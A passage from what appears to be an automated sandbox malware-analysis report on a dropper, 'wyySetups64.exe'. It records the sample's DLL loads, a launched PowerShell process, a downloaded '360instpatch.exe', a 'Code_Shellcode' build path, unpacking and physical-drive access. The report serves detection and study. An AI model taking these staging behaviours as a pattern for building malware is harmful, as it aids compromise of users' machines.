    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: winrnr.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dxgi.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: dinput8.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: inputhost.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: coremessaging.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: coreuicomponents.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: ntmarta.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: devenum.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: devobj.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msasn1.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msdmo.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: avicap32.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: msvfw32.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeSection loaded: windowscodecs.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: apphelp.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: msimg32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: version.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wininet.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: urlmon.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iertutil.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: srvcli.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netutils.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: firewallapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dnsapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwbase.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: sspicli.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wldp.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: profapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winhttp.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: mswsock.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winnsi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasadhlp.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netapi32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: secur32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasapi32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: msimg32.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: version.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iphlpapi.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: wininet.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: urlmon.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: iertutil.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: srvcli.dll
    Source: C:\Users\user\Downloads\360instpatch.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
    Source: C:\Users\user\Desktop\wyySetups64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile written: C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp.dir\setup.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Downloads\360instpatch.exeWindow detected: Number of UI elements: 24
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: wyySetups64.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: wyySetups64.exeStatic file information: File size 3213672 > 1048576
    Source: wyySetups64.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c2200
    Source: wyySetups64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: \Release\Code_Shellcode.pdb source: wyySetups64.exe, wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: 360instpatch.exe, 00000008.00000003.1797435191.0000000004191000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp, 360P2SP.dll.8.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr
    Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: wyySetups64.exe, 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, wyySetups64.exe, 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360instpatch.exe, 00000008.00000000.1789664825.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000000.1798248831.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch.exe, 00000009.00000002.1799466185.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp, 360instpatch[1].exe.0.dr, 360instpatch.exe.0.dr
    Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.dr

    Data Obfuscation

    Source: C:\Users\user\Desktop\wyySetups64.exeUnpacked PE file: 0.2.wyySetups64.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,0_2_10001170
    Source: wyySetups64.exeStatic PE information: real checksum: 0x318112 should be: 0x317541
    Source: wyySetups64.exe.0.drStatic PE information: real checksum: 0x318112 should be: 0x317541
    Source: wyySetups64.exeStatic PE information: section name: .didata
    Source: wyySetups64.exe.0.drStatic PE information: section name: .didata
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03384345 push ecx; ret 1_2_03384358
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0339A168 push eax; ret 1_2_0339A119
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0339A0B8 push eax; ret 1_2_0339A119
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392471 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392470 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03392450 push ebp; retf 1_2_03392474
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD9DF5 push ecx; ret 1_2_00BD9E08
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BEFE9A push ecx; ret 1_2_00BEFEBF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CAFF push eax; retf 1_2_00B2CB00
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB07 pushad ; retf 1_2_00B2CB08
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB0B push 701000CBh; retf 1_2_00B2CB10
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B2CB61 pushfd ; retf 1_2_00B2CB64
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B29DCC push ecx; ret 1_2_00B29DDF
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03203D04 push ecx; ret 1_2_03203D17
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540C7F push eax; retf 0070h6_2_03540CBA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540CCF push eax; retf 0070h6_2_03540CDA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03540CBF push eax; retf 0070h6_2_03540CCA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B94821 push ecx; ret 8_2_00B94834
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B27330 push ecx; mov dword ptr [esp], 00000000h8_2_00B27331
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B954F9 push ecx; ret 8_2_00B9550C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B139B0 push ecx; mov dword ptr [esp], 00000000h8_2_00B139B1
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B13C30 push ecx; mov dword ptr [esp], 00000000h8_2_00B13C31
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF38EFC push ecx; ret 8_2_6BF38F0F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEE2640 push ecx; mov dword ptr [esp], 00000000h8_2_6BEE2641
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3BD51 push ecx; ret 8_2_6BF3BD64
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDDE944 push ecx; ret 8_2_6CDDE957
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CD22500 push ecx; mov dword ptr [esp], 00000000h8_2_6CD22501
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDABDEB push edi; retf 8_2_6CDABDF5
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B28144 push dword ptr [ebp+ebp*8+3Bh]; ret 9_2_00B28149
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B94821 push ecx; ret 9_2_00B94834
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B27330 push ecx; mov dword ptr [esp], 00000000h9_2_00B27331

    Persistence and Installation Behavior

    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81BEB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d8_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BF52940
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF523F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF527B0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE46C9
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE4660
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B16759
